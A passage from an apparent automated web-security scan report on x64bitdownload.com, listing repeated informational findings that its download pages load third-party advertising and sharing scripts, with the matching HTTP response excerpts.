Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.27. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.28. http://www.x64bitdownload.com/64-bit-firefox-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-firefox-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.29. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.30. http://www.x64bitdownload.com/64-bit-forum-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.31. http://www.x64bitdownload.com/64-bit-forums-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.32. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-google-groups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.33. http://www.x64bitdownload.com/64-bit-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.34. http://www.x64bitdownload.com/64-bit-group-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.35. http://www.x64bitdownload.com/64-bit-groups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-groups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.36. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.37. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.38. http://www.x64bitdownload.com/64-bit-images-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.39. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.40. http://www.x64bitdownload.com/64-bit-internet-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.41. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

5.42. http://www.x64bitdownload.com/64-bit-killfile-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
